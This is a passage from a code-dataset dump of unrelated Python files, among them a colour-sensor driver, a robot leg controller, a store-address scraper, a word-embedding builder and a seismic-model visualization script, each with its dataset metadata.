self.i2c.write(0x00, 0x83)\n\n    def getColor(self, addClear: bool = False) -> typing.List[int]:\n        if addClear:\n            self.clearChannel = self.readRawRegister(0x80 | 0x20 | 0x14, 1)[0]\n        self.redChannel = int.from_bytes(self.readRawRegister(0x80 | 0x20 | 0x16, 2), byteorder=\"big\")\n        self.greenChannel = int.from_bytes(self.readRawRegister(0x80 | 0x20 | 0x18, 2), byteorder=\"big\")\n        self.blueChannel = int.from_bytes(self.readRawRegister(0x80 | 0x20 | 0x1a, 2), byteorder=\"big\")\n        \n        color = [self.redChannel, self.greenChannel, self.blueChannel]\n        if addClear:\n            color.append(self.clearChannel)\n        return color\n\n    def getRed(self):\n        redRegLow = int.from_bytes(self.readRawRegister(0x80 | 0x20 | 0x16, 2), byteorder=\"big\")\n        # redRegHigh = int.from_bytes(self.readRawRegister(0x17, 1), byteorder=\"big\")\n        return redRegLow\n\n    def getGreen(self):\n        greenRegLow = int.from_bytes(self.readRawRegister(0x80 | 0x20 | 0x18, 2), byteorder=\"big\")\n        # greenRegHigh = int.from_bytes(self.readRawRegister(0x19, 1), byteorder=\"big\")\n        return greenRegLow\n\n    def getBlue(self):\n        blueRegLow = int.from_bytes(self.readRawRegister(0x80 | 0x20 | 0x1a, 2), byteorder=\"big\")\n        # blueRegHigh = int.from_bytes(self.readRawRegister(0x1b, 1), byteorder=\"big\")\n        return blueRegLow\n\n    def readRegister(self, register: int, bytes: int) -> int:\n        return int.from_bytes(self.i2c.read(register, bytes), byteorder=\"big\")\n\n    def readRawRegister(self, register: int, bytes: int) -> bytearray:\n        return self.i2c.read(register, bytes)\n","sub_path":"sensors/rev_color_sensor.py","file_name":"rev_color_sensor.py","file_ext":"py","file_size_in_byte":4368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"421250931","text":"# Quadruped robot leg class\n# Created in 2019 10/20\n# Version = 1.0\n# Author Junwen Cui\n\nfrom controller import *\nfrom comm.action.basis import Speed,Pos,Torque,Force,IK,DK,vallimit,torque2force\nimport numpy as np\n\nclass Leg():\n\n    def __init__(self, module_name, module_info):\n\n        self.module_info = module_info\n\n        self.speed = Speed() #Current speed\n        self.speed_f = Speed() #Desired speed\n        \n        self.position = Pos() #Current position\n        self.position_f = Pos() #Desired position\n\n        self.torque_f = Torque() #Desired torque\n        \n        self.force = Force()\n        self.force_f = Force() #Desired foot force\n\n        self.swing_angle = 0\n        self.thign_angle = 0\n        self.calf_angle = 0\n\n        self.swing_angle_f = 0 #Desired motor position\n        self.thign_angle_f = 0\n        self.calf_angle_f = 0\n\n        self.touchstate = 0\n\n        self.swing_motor = Motor(module_name['swing_motor_s'])\n        self.thign_motor = Motor(module_name['thignleg_motor_s'])\n        self.calf_motor = Motor(module_name['calfleg_motor_s'])\n\n        self.swing_motor.enableTorqueFeedback(2)\n        self.thign_motor.enableTorqueFeedback(2)\n        self.calf_motor.enableTorqueFeedback(2)\n\n        self.swing_positionsensor = 
PositionSensor(module_name['swing_positionsensor_s'])\n self.thign_positionsensor = PositionSensor(module_name['thign_positionsensor_s'])\n self.calf_positionsensor = PositionSensor(module_name['calf_positionsensor_s'])\n self.swing_positionsensor.enable(2)\n self.thign_positionsensor.enable(2)\n self.calf_positionsensor.enable(2)\n\n self.touchsensor = TouchSensor(module_name['foot_touchsensor_s'])\n self.touchsensor.enable(2)\n\n def refresh(self, type_ = 'all'): \n '''\n Refresh the position of the motor and calculate the position of the end of the foot, \n and collect the pressure of the end of the foot\n '''\n\n if(type_ == 'all'):\n\n self.swing_angle = self.swing_positionsensor.getValue()\n self.thign_angle = self.thign_positionsensor.getValue()\n self.calf_angle = self.calf_positionsensor.getValue()\n\n DK(self, self.module_info) #refresh leg xyz position \n\n #refresh foot force\n self.force = self.touchsensor.getValues()\n for i in range(3):\n self.force[i] /= 10\n\n #foot touch judge\n if( np.sqrt(np.square(self.force[0]) + np.square(self.force[1]) + np.square(self.force[2])) >= 8 ):\n self.touchstate = 1\n else:\n self.touchstate = 0\n\n def __set_torque(self, swing_torque, thign_torque, calf_torque): \n '''\n Set motor torque\n '''\n\n swing_torque = vallimit(swing_torque, -20, 20)\n thign_torque = vallimit(thign_torque, -20, 20)\n calf_torque = vallimit(calf_torque, -20, 20)\n\n self.swing_motor.setTorque(float(swing_torque))\n self.thign_motor.setTorque(float(thign_torque))\n self.calf_motor.setTorque(float(calf_torque))\n\n def __set_motorspeed(self, swing_speed, thign_speed, calf_speed): \n '''\n Set motor speed\n '''\n\n self.swing_motor.setVelocity(swing_speed)\n self.thign_motor.setVelocity(thign_speed)\n self.calf_motor.setVelocity(calf_speed)\n\n def __set_motorposition(self): \n '''\n Set motor position\n '''\n\n self.swing_motor.setPosition(self.swing_angle_f)\n self.thign_motor.setPosition(self.thign_angle_f)\n self.calf_motor.setPosition( self.calf_angle_f)\n\n\n def set_force(self, force): \n '''\n Set foot force vector\n '''\n\n self.force_f = force\n\n torque2force(self, self.module_info)\n\n self.__set_torque(self.torque_f.swing, self.torque_f.thign, self.torque_f.calf)\n\n return 0\n\n def set_velocity(self, speed): \n '''\n Set foot speed vector\n '''\n return 0\n\n def set_position(self, pos): \n '''\n Set foot position\n '''\n\n self.position_f = pos\n IK(self, self.module_info)\n\n self.__set_motorposition()\n\n return 0","sub_path":"controllers/dog_b/comm/base/leg.py","file_name":"leg.py","file_ext":"py","file_size_in_byte":4214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"359737217","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n#############################################################################\n#\n# Copyright (c) 2013 Baidu.com, Inc. 
All Rights Reserved\n#\n#############################################################################\n#\n#\n# @file server/send.py\n# @author Chen Weican(chenweican@baidu.com)\n# @date 2013/09/10 12:06:02\n# @brief\n#\n#############################################################################\nimport httplib\nimport urllib2\nimport urllib\nimport sys\nimport logging\nimport urlparse\n\ndef send_to_url(url, data, body_content, platform, version):\n    logger = logging.getLogger()\n    parse = urlparse.urlparse(url)\n    host = parse.netloc\n    url_pre = parse.path + \"?\" + parse.query\n    header = dict()\n    header['Accept-Encoding'] = 'gzip'\n    header['S-COOKIE'] = data\n    header['DODROID_PLATFORM'] = platform\n    header['DODROID_VERSION'] = version\n    header['DODROID_BIULDID'] = \"20130109\"\n    header['Charset'] = \"UTF-8\"\n    #header['Content-Length'] = body_content.count('')\n    header['Content-Length'] = len(body_content)\n    conn = httplib.HTTPConnection(host)\n    #conn.request(method='POST', url='/DodroidServlet?cmd=updateaddr', body=params, headers=header)\n    try:\n        conn.request(method='POST', url=url_pre, body=body_content, headers=header)\n        response = conn.getresponse()\n        ret = response.read()\n        if (200 == response.status):\n            if ( ret.find('error') >= 0):\n                return False\n            return True\n        else:\n            return False\n    except Exception as e:\n        logger.exception(e)\n        return False\n\n    \n","sub_path":"server/sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"43939340","text":"from hand_pose import Hand_Pose\nimport RPi.GPIO as GPIO\nimport ClientSocket\nfrom random import randint \nimport time\nfrom pyEMS.EMSCommand import ems_command\nfrom pyEMS import openEMSstim\nfrom threading import Thread\n\nmy_ems_board = openEMSstim.openEMSstim(\"/dev/ttyUSB0\",19200)\nintensity1 = 0\nintensity2 = 0\nmode = 1\n\n\"\"\"def cameraThreadFunc(handPose):\n    print ('start camera')\n    GPIO.output(3, GPIO.HIGH)\n    handPose.startCamera()\"\"\"\n\ndef printNum2Str(preStr, number):\n    if number == 1:\n        print (preStr + 'rock')\n    elif number == 2:\n        print (preStr + 'scissor')\n    elif number == 3:\n        print (preStr + 'paper')\n    else:\n        pass\n\ndef socketThreadFunc(hand_pose):\n    global intensity1, intensity2, mode\n    cc = ClientSocket.ClientSocket('172.20.10.3', 4001)\n    cc.connect()\n\n    try:\n        while True:\n            if cc.checkRecv():\n                cmd = cc.recvCmd()\n                params = cc.recvParam()\n                print (\"cmd = %s\" % cmd)\n                print (\"params = %s\" % params)\n                \n                if cmd == '1':\n                    intensity1 = int(params[0])\n                    intensity2 = 
int(params[1])\n mode = int(params[2])\n EMS(mode, intensity1, intensity2)\n else:\n print (\"wrong cmd\")\n time.sleep(0.01)\n finally:\n GPIO.output(3, GPIO.LOW)\n\n \ndef EMS(number, intensity1, intensity2):\n if number == 2:\n # print (\"scissor\",)\n # print (intensity2)\n my_ems_board.send(ems_command(1,intensity2,1000))\n elif number == 1:\n # print (\"rock\",)\n # print (intensity1)\n my_ems_board.send(ems_command(1,intensity1,1000))\n time.sleep(0.01)\n my_ems_board.send(ems_command(2,intensity1,1000))\n else:\n pass \n\nif __name__ == '__main__':\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(3, GPIO.OUT)\n #GPIO.output(3, GPIO.LOW)\n GPIO.output(3, GPIO.HIGH)\n \n hand_pose = Hand_Pose()\n socketThread = Thread(target = socketThreadFunc, args = (hand_pose,))\n socketThread.start()\n hand_pose.startCamera()\n \n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"401564065","text":"\"\"\"Build an np.array from some glove file and some vocab file\r\n\r\nYou need to download `glove.840B.300d.txt` from\r\nhttps://nlp.stanford.edu/projects/glove/ and you need to have built\r\nyour vocabulary first (Maybe using `build_vocab.py`)\r\n\"\"\"\r\n\r\n__author__ = \"Guillaume Genthial\"\r\n\r\nfrom pathlib import Path\r\n\r\nimport numpy as np\r\n\r\nroot_dir = \"/data/kongyy/nlp/tf_ner_guillaumegenthial/\"\r\n\r\n\r\nif __name__ == '__main__':\r\n import sys\r\n if len(sys.argv) < 2:\r\n print(\"usage: python build_w2v.py opinion_id\")\r\n sys.exit(0)\r\n opinion_id = sys.argv[1]\r\n DATADIR = root_dir + 'example/{}/'.format(opinion_id)\r\n # Load vocab\r\n with Path(DATADIR + 'vocab.words.txt').open() as f:\r\n word_to_idx = {line.strip(): idx for idx, line in enumerate(f)}\r\n size_vocab = len(word_to_idx)\r\n emb_szie = 60\r\n level = \"char\"\r\n\r\n # Array of zeros\r\n embeddings = np.zeros((size_vocab, emb_szie))\r\n\r\n # Get relevant glove vectors\r\n found = 0\r\n print('Reading W2V file (may take a while)')\r\n with open('/data/kongyy/nlp/word_vectors/typical_opinion_{}_{}.txt'.format(level, emb_szie), \"r\", encoding=\"utf8\",\r\n errors=\"ignore\") as f:\r\n for line_idx, line in enumerate(f):\r\n if line_idx % 1000 == 0:\r\n print('- At line {}'.format(line_idx))\r\n line = line.strip().split()\r\n if len(line) != emb_szie + 1:\r\n continue\r\n word = line[0]\r\n embedding = line[1:]\r\n if word in word_to_idx:\r\n found += 1\r\n word_idx = word_to_idx[word]\r\n embeddings[word_idx] = embedding\r\n print('- done. 
Found {} vectors for {} words'.format(found, size_vocab))\r\n\r\n # Save np.array to file\r\n np.savez_compressed(DATADIR + 'w2v_{}.npz'.format(opinion_id), embeddings=embeddings)\r\n","sub_path":"data/example/build_w2v.py","file_name":"build_w2v.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"311070159","text":"import requests\nfrom bs4 import BeautifulSoup\nimport datetime\nimport json\nimport pandas as pd\nfrom pandas import ExcelWriter\nimport re\n\nmain_domian = 'http://pokupochka.ru/shop/all'\n\ngood_data = []\n\ndef get_all_shop():\n r = requests.get(main_domian)\n page = BeautifulSoup(r.text, 'html.parser')\n last_page = page.find('ul', class_='pagination pag_dop').find_all('li')[-1].find('a').get_text()\n last_page = int(last_page)\n for num_page in range(1, last_page+1):\n shops_on_page(f'http://pokupochka.ru/shop/all/page/{num_page}')\n\n\ndef shops_on_page(url):\n r = requests.get(url)\n page = BeautifulSoup(r.text, 'html.parser')\n for shop in page.find('div', class_='shop_list').find_all('div', class_=\"item\"):\n\n\n good_row = {}\n\n shop_url = 'http://pokupochka.ru' + shop.find('div', class_='row').find('a')['href']\n good_row['shop_url'] = shop_url\n\n address = shop.find('div', class_='row').find('div', class_='address').get_text()\n phone = shop.find('div', class_='row').find('div', class_='phone').get_text()\n workday = shop.find('div', class_='row').find('div', class_='col-sm-3 workday').get_text()\n\n good_row['address'] = address.encode('latin-1').decode(\"utf-8\")\n good_row['working_time'] = workday.encode('latin-1').decode(\"utf-8\")\n\n good_row['x'],good_row['y'] = get_coords_shop(shop_url)\n\n good_row['brand_name'] = 'Покупочка'\n good_row['country'] = 'Russian Federation'\n good_row['holding_name'] = 'Покупочка'\n good_row['date_review'] = datetime.datetime.now()\n\n good_row['website'] = 'http://pokupochka.ru'\n\n\n print(good_row)\n good_data.append(good_row)\n\n\n\ndef get_coords_shop(url):\n r = requests.get(url)\n page = BeautifulSoup(r.text, 'html.parser')\n y,x = page.find('div', id='map')['data-coord'].split(',')\n return x,y\n\n\n# Функция для записи в XLSX не вызываетя ( закомпилирована ) см. maria_pd_data\ndef write_xlsx(df, name_file):\n writer = ExcelWriter(f'{name_file}.xlsx')\n df.to_excel(writer, 'Sheet1')\n writer.save()\n return 'ФАЙЛ СОХРАНЕН'\n\ndef pokupochka_pd_data():\n\n '''\n Парсер используем BS4 и requests\n 1. выесяням сколько всего страниц с магазинами (ищем крайнию)\n last_page = page.find('ul', class_='pagination pag_dop').find_all('li')[-1].find('a').get_text()\n 2. фомируме url http://pokupochka.ru/shop/all/page/{num_page}\n 3. Перебираем все страницы с магазинами с забираем все строки с данными и ссылку на коннктретный магазин\n page.find('div', class_='shop_list').find_all('div', class_=\"item\")\n 4. По ссылке на конкретный магазин переходим и забираем координаты\n good_row['x'],good_row['y'] = get_coords_shop(shop_url)\n 5. Формируем good_row записываем в good_data\n 6. 
Из данных находяшихся в good_data формируем df\n\n\n :return:\n '''\n\n\n get_all_shop()\n df = pd.DataFrame(good_data)\n #write_xlsx(df,'pokupochka')\n return df\n\n\n\n","sub_path":"crawlers/shop/pokupochka.py","file_name":"pokupochka.py","file_ext":"py","file_size_in_byte":3316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"552488271","text":"# coding=utf-8\nimport logging.config\nimport os\nimport pickle\nimport sys\nimport multiprocessing\nfrom collections import defaultdict\n\nfrom simple_settings import settings\n\nif __name__ == '__main__':\n pid = os.fork()\n if pid > 0:\n sys.exit(0)\n os.environ['SIMPLE_SETTINGS'] = 'settings.master'\n settings.setup()\n from algorithm.search.ga import GA\n from algorithm.search.greedy import Greedy\n\n logging.config.dictConfig(settings.LOGGING_CONFIG)\n\n logger = logging.getLogger('test')\n\n greedy_result = defaultdict(defaultdict)\n ga_result = defaultdict(defaultdict)\n\n result = {\n 'greedy': greedy_result,\n 'ga': ga_result\n }\n\n pool = multiprocessing.Pool(processes=multiprocessing.cpu_count())\n processes = []\n for graph, sum_of_edge in settings.GRAPHS:\n for func, func_args in settings.FUNCS:\n greedy = Greedy(graph=graph, sum_of_edge=sum_of_edge, func=func, func_args=func_args)\n processes.append(\n (('greedy', graph, sum_of_edge, func.__name__, func_args), pool.apply_async(greedy.anonymize)))\n\n for edges_sum in range(1, sum_of_edge + 1, 1):\n ga = GA(graph=graph, population_size=400, chromosome_size=edges_sum, func=func, func_args=func_args,\n mate_probability=0.8, mutate_probability=0.02, disaster_interval=20, generation_num=200)\n processes.append((('ga', graph, edges_sum, func.__name__, func_args), pool.apply_async(ga.run)))\n\n pool.close()\n pool.join()\n\n for info, process in processes:\n key, graph, sum_of_edge, func_name, func_args = info\n try:\n result[key][graph][func_name] = process.get()\n except:\n continue\n\n with open('result.dict', 'wb') as f:\n pickle.dump(result, f)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"25881994","text":"from datetime import date\nfrom PyQt5 import QtWidgets, uic\nfrom PyQt5 import QtGui\nfrom Modelo.arregloProductos import *\nfrom Modelo.arregloClientes import *\nfrom Modelo.arregloDetalleVenta import *\nfrom Modelo.arregloFactura import *\nfrom Vista.ventanaClientes import *\nfrom Vista.ventanaProductos import *\n\naDetVent = ArregloDetalleVenta()\naFac = ArregloFactura() \n\nlista = []\n\nclass VentanaVentas(QtWidgets.QMainWindow):\n\n def __init__(self,parent = None):\n super(VentanaVentas,self).__init__(parent)\n self.setWindowIcon(QtGui.QIcon(\"UI/imagenes/venta.png\"))\n uic.loadUi(\"UI/ventanaVentas.ui\", self)\n\n self.btnBuscarCliente.clicked.connect(self.buscarCliente)\n self.btnBuscarProducto.clicked.connect(self.buscarProducto)\n self.btnAgregar.clicked.connect(self.agregar)\n self.btnGenerar.clicked.connect(self.generarVenta)\n self.btnImprimirFactura.clicked.connect(self.imprimirFactura)\n self.btnCerrar.clicked.connect(self.cerrarVentana)\n self.calcularFecha()\n self.generarNumeroDocumento()\n self.item = 0\n self.stock_actual_temporal = {}\n\n def buscarCliente(self):\n codigoCliente = self.txtCodigoCliente.text()\n if self.txtCodigoCliente.text() == \"\":\n QtWidgets.QMessageBox.information(self, \"Código Cliente\", \"Debe ingresar el código del cliente...!!!\", 
QtWidgets.QMessageBox.Ok)\n else:\n pos = aCli.buscarCliente(codigoCliente)\n objCliente = aCli.devolverCliente(pos)\n if pos == -1:\n QtWidgets.QMessageBox.information(self, \"Código Cliente\", \"Cliente no registrado...!!!\", QtWidgets.QMessageBox.Ok)\n else:\n self.txtNombres.setText(objCliente.getNombresCliente() + \" \" + objCliente.getApellidoPaternoCliente() + \" \" + objCliente.getApellidoMaternoCliente())\n \n def buscarProducto(self):\n codigoProducto = self.txtCodigoProducto.text()\n if self.txtCodigoProducto.text() == \"\":\n QtWidgets.QMessageBox.information(self, \"Código Producto\", \"Debe ingresar el código del producto...!!!\", QtWidgets.QMessageBox.Ok)\n else:\n pos = aPro.buscarProducto(codigoProducto)\n objProducto = aPro.devolverProducto(pos)\n if pos == -1:\n QtWidgets.QMessageBox.information(self, \"Código Producto\", \"Producto no registrado...!!!\", QtWidgets.QMessageBox.Ok)\n else:\n stock_temporal = self.obtenerStockActualTemporal(codigoProducto)\n if stock_temporal == -1: # ocurre cuando no existe el producto en el diccionario\n self.stock_actual_temporal[self.txtCodigoProducto.text()] = int(objProducto.getStockActual())\n stock_temporal = self.obtenerStockActualTemporal(codigoProducto) \n self.txtDescripcion.setText(objProducto.getDescripcion())\n self.txtStock.setText(str(stock_temporal))\n self.txtPrecio.setText(objProducto.getPrecioVenta())\n \n def obtenerStockActualTemporal(self, codigoProducto):\n stockEncontrado = -1 # variable auxiliar que contiene de manera predeterminada -1, indicando que no se encontró el stock\n if len(self.stock_actual_temporal) != 0: \n for llave in self.stock_actual_temporal:\n if llave == codigoProducto:\n stockEncontrado = self.stock_actual_temporal[llave]\n return stockEncontrado\n return stockEncontrado\n\n def actualizarStockActualTemporal(self, codigoProducto, cantidad):\n for llave in self.stock_actual_temporal:\n if llave == codigoProducto:\n self.stock_actual_temporal[llave]= self.stock_actual_temporal[llave] - cantidad\n\n def obtenerNumeroDocumento(self):\n return self.txtNumeroDocumento.text()\n \n def obtenerCodigo(self):\n return self.txtCodigoProducto.text()\n \n def obtenerDescripcion(self):\n return self.txtDescripcion.text()\n \n def obtenerPrecio(self):\n return float(self.txtPrecio.text())\n\n def obtenerCantidad(self):\n return int(self.txtCantidad.text()) \n \n def obtenerItem(self):\n self.item = self.item + 1\n return self.item\n \n def obtenerFecha(self):\n return self.txtFecha.text() \n\n def calcularFecha(self):\n self.fecha = date.today()\n dia = self.fecha.day\n mes = self.fecha.month\n año = self.fecha.year\n self.txtFecha.setText(str(dia) + \"/\" + str(mes) + \"/\" + str(año))\n\n def imprimirFactura(self):\n try:\n if self.txtNumeroDocumento.text() == \"\":\n QtWidgets.QMessageBox.information(self, \"Imprimir Factura\", \"No se ha realizado ninguna venta...!!!\", QtWidgets.QMessageBox.Ok) \n else: \n numeroFactura = self.txtNumeroDocumento.text()\n pos = aFac.buscarFactura(numeroFactura)\n objFact = aFac.devolverFactura(pos)\n codigoCliente = self.txtCodigoCliente.text()\n pos = aCli.buscarCliente(codigoCliente)\n objCliente = aCli.devolverCliente(pos)\n objFact.imprimirDocumentoVenta(objCliente)\n aDetVent.imprimirDetalleVenta(numeroFactura, aPro)\n QtWidgets.QMessageBox.information(self, \"Imprimir Factura\", \"La factura se ha impreso correctamente...!!!\", QtWidgets.QMessageBox.Ok) \n self.close()\n except:\n QtWidgets.QMessageBox.information(self, \"Imprimir Factura\", \"No se ha realizado 
ninguna venta...!!!\", QtWidgets.QMessageBox.Ok) \n\n def agregar(self):\n try:\n if int(self.txtCantidad.text()) > int(self.txtStock.text()):\n QtWidgets.QMessageBox.information(self, \"Venta\", \"No se puede vender esa cantidad...!!!\", QtWidgets.QMessageBox.Ok)\n elif int(self.txtCantidad.text()) <= 0:\n QtWidgets.QMessageBox.information(self, \"Venta\", \"La cantidad ingresada es incorrecta...!!!\", QtWidgets.QMessageBox.Ok)\n else:\n lista.append((self.obtenerItem(), self.obtenerCodigo(), self.obtenerDescripcion(), self.obtenerPrecio(), self.obtenerCantidad(),self.obtenerPrecio()*self.obtenerCantidad()))\n self.actualizarStockActualTemporal(self.obtenerCodigo(),self.obtenerCantidad())\n self.mostrarDetalle() \n self.calcularPago()\n except:\n QtWidgets.QMessageBox.information(self, \"Agregar Detalle\", \"No se ha completado los detalles del producto...!!!\", QtWidgets.QMessageBox.Ok) \n self.item = self.item - 1\n\n def mostrarDetalle(self):\n self.tblDetalle.setRowCount(len(lista))\n self.tblDetalle.setColumnCount(6)\n self.tblDetalle.verticalHeader().setVisible(False)\n for i in range(len(lista)):\n self.tblDetalle.setItem(i, 0, QtWidgets.QTableWidgetItem(str(lista[i][0])))\n self.tblDetalle.setItem(i, 1, QtWidgets.QTableWidgetItem(str(lista[i][1])))\n self.tblDetalle.setItem(i, 2, QtWidgets.QTableWidgetItem(str(lista[i][2])))\n self.tblDetalle.setItem(i, 3, QtWidgets.QTableWidgetItem(str(lista[i][3])))\n self.tblDetalle.setItem(i, 4, QtWidgets.QTableWidgetItem(str(lista[i][4])))\n self.tblDetalle.setItem(i, 5, QtWidgets.QTableWidgetItem(str(lista[i][5])))\n self.limpiarControles()\n\n def limpiarControles(self):\n self.txtCodigoProducto.clear()\n self.txtDescripcion.clear()\n self.txtStock.clear()\n self.txtPrecio.clear()\n self.txtCantidad.clear()\n \n def limpiarControlesTotal(self):\n self.txtNumeroDocumento.clear()\n self.txtCodigoCliente.clear()\n self.txtNombres.clear()\n self.txtCodigoProducto.clear()\n self.txtDescripcion.clear()\n self.txtStock.clear()\n self.txtPrecio.clear()\n self.txtCantidad.clear()\n self.txtTotalPagar.clear()\n self.tblDetalle.clearContents()\n self.tblDetalle.setRowCount(0)\n\n def calcularPago(self):\n self.subtotal_pagar = 0\n for i in range(len(lista)):\n self.subTotal = lista[i][5]\n self.subtotal_pagar = self.subtotal_pagar + float(self.subTotal)\n self.igv = 0.18 * self.subtotal_pagar\n self.total_pagar = self.subtotal_pagar + self.igv \n self.txtSubTotal.setText(\"S/. \" + str(round(self.subtotal_pagar, 2)))\n self.txtIgv.setText(\"S/. \" + str(round(self.igv, 2)))\n self.txtTotalPagar.setText(\"S/. 
\" + str(round(self.total_pagar, 2)))\n\n def generarVenta(self):\n if self.tblDetalle.rowCount() == 0:\n QtWidgets.QMessageBox.information(self, \"Venta\", \"No se ha agregado ningún detalle...!!!\", QtWidgets.QMessageBox.Ok)\n else: \n objFact = Factura(self.obtenerNumeroDocumento(), self.obtenerFecha(), self.txtIgv.text(), self.txtTotalPagar.text(), self.txtCodigoCliente.text())\n numeroFactura = self.obtenerNumeroDocumento()\n if aFac.buscarFactura(numeroFactura) == -1:\n aFac.adicionaFactura(objFact)\n self.actualizarStock()\n self.guardarDetalleVenta()\n aFac.grabar()\n aPro.grabar()\n QtWidgets.QMessageBox.information(self, \"Venta\", \"Se realizó la venta correctamente...!!!\", QtWidgets.QMessageBox.Ok)\n lista.clear()\n else:\n QtWidgets.QMessageBox.information(self, \"Venta\", \"El número de factura ingesado ya existe...!!!\", QtWidgets.QMessageBox.Ok)\n\n def actualizarStock(self):\n for i in range(self.tblDetalle.rowCount()):\n codigoProducto = self.tblDetalle.item(i, 1).text()\n cantidad = int(self.tblDetalle.item(i, 4).text())\n pos = aPro.buscarProducto(codigoProducto)\n objProducto = aPro.devolverProducto(pos)\n stock_actual = int(objProducto.getStockActual()) - cantidad\n aPro.actualizarStock(stock_actual, codigoProducto)\n\n def guardarDetalleVenta(self):\n for i in range(len(lista)):\n objDetVent = DetalleVenta(self.obtenerNumeroDocumento(), lista[i][0], lista[i][1], lista[i][3], lista[i][4])\n aDetVent.adicionaDetalleVenta(objDetVent)\n aDetVent.grabar()\n\n def generarNumeroDocumento(self):\n numeroDocunento = aFac.nroSerie()\n if numeroDocunento == 0:\n self.txtNumeroDocumento.setText(\"000001\")\n else:\n self.incremento = numeroDocunento\n self.incremento = self.incremento + 1\n self.txtNumeroDocumento.setText(\"00000\" + str(self.incremento))\n\n def cerrarVentana(self):\n lista.clear()\n self.close()","sub_path":"Vista/ventanaVentas.py","file_name":"ventanaVentas.py","file_ext":"py","file_size_in_byte":10814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"132162653","text":"import yt\nfrom yt_velmodel_vis import seis_model as sm\nfrom yt_velmodel_vis import shapeplotter as sp\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\n\nfname='NWUS11-S_percent.nc'\nout_dir='./output'\nmodel=sm.netcdf(fname)\n\n# interpolate the cartesian (or load it if it exists)\nmx=50000\ndvs_n=os.path.join(out_dir,fname.split('.')[0]+'_dvs_interp_'+str(mx)+'.npy')\nif os.path.isfile(dvs_n):\n model.coordTransform('sphere2cart')\n print(\"Loading cartesian-interpolated data from file\")\n dvs = np.load(dvs_n)\nelse:\n model.interp2cartesian(fields=['dvs'],res=[10000,10000,10000], input_units='m',max_dist=mx)\n dvs=model.interp['data']['dvs']\n np.save(dvs_n,dvs)\ndata={}\ndata['dvs']=dvs\n\n# set some gaussians for the TF\nbnds=[-6,10.]\ntf = yt.ColorTransferFunction((bnds[0],bnds[1]))\n# [center location, peak width, (red, green, blue, alpha)]\nTF_gausians=[[-2,1,(1.,0.0,0.0,0.8)],\n [2,1,(0.,0.0,1.0,0.8)]]\nfor gau in TF_gausians:\n tf.add_gaussian(gau[0],gau[1],gau[2])\n\n# plot the TF with a histogram\nx = np.linspace(bnds[0],bnds[1],tf.nbins)\ny = tf.funcs[3].y\nw = np.append(x[1:]-x[:-1], x[-1]-x[-2])\ncolors = np.array([tf.funcs[0].y, tf.funcs[1].y, tf.funcs[2].y,\n tf.funcs[3].y]).T\nfig = plt.figure(figsize=[6, 3])\nax = fig.add_axes([0.2, 0.2, 0.75, 0.75])\nd_hist=ax.hist(data['dvs'][~np.isnan(dvs)].ravel(),bins=100,density=True,log=False)\nax.bar(x, tf.funcs[3].y, w, edgecolor=[0.0, 0.0, 0.0, 0.0],\n 
log=False, color=colors, bottom=[0])\nplt.savefig(os.path.join(out_dir,'shapeplotter_tf.png'))\n\n# load the data as a uniform grid, create the 3d scene\nsc_mult=1.0 # scale multiplier\nbbox = model.cart['bbox'] # list-like [[xmin,xmax],[ymin,ymax],[zmin,zmax]]\nprint(bbox)\nds = yt.load_uniform_grid(data,data['dvs'].shape,sc_mult,bbox=bbox,nprocs=1,\n periodicity=(True,True,True),unit_system=\"mks\")\n\nsc = yt.create_scene(ds,'dvs')\n\n# Draw the domain boundary\n\n# draw true boundary extents\nlat_rnge=[np.min(model.data.variables['latitude']),np.max(model.data.variables['latitude'])]\nlon_rnge=[np.min(model.data.variables['longitude']),np.max(model.data.variables['longitude'])]\nmin_dep=0.\nmax_dep=1200.\nR=6371.\nr_rnge=[(R-max_dep)*1000.,(R-min_dep)*1000.]\nChunk=sp.sphericalChunk(lat_rnge,lon_rnge,r_rnge)\nsc=Chunk.domainExtent(sc,RGBa=[1.,1.,1.,0.005],n_latlon=100,n_rad=50)\nsc=Chunk.latlonGrid(sc,RGBa=[1.,1.,1.,0.005])\nsc=Chunk.latlonGrid(sc,RGBa=[1.,1.,1.,0.001],radius=(R-410.)*1000.)\nsc=Chunk.latlonGrid(sc,RGBa=[1.,1.,1.,0.001],radius=(R-max_dep)*1000.)\nsc=Chunk.wholeSphereReference(sc,RGBa=[1.,1.,1.,0.001])\n\nYS_lat=np.array([44.429764])\nYS_lon=np.array([-110.584663])\nYS_rads=np.array([6371.*1e3])\nsc=sp.addShapeToScene(sc,YS_lat,YS_lon,YS_rads,'PointSource',[1.,1.,1.,0.005],6)\n\n\n# some camera settings\npos=sc.camera.position\nprint(pos)\nsc.camera.set_position(pos,north_vector=np.array([0.0, 0.0, 1.0]))\nsource = sc.sources['source_00']\nsource.tfh.set_log(False)\n\n\nres=sc.camera.get_resolution()\nres_factor=3\nnew_res=(res[0]*res_factor,res[1]*res_factor)\nsc.camera.set_resolution(new_res)\n# apply the TF and render it\nsource.set_transfer_function(tf)\nnm='shapeplotter.png'\nsc.save(os.path.join(out_dir,nm),sigma_clip=3)\n","sub_path":"scripts/initial_testScripts/shapeplotter_yttest.py","file_name":"shapeplotter_yttest.py","file_ext":"py","file_size_in_byte":3216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"47977472","text":"# Exercise 3.3\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Pretty plot settings\nimport seaborn 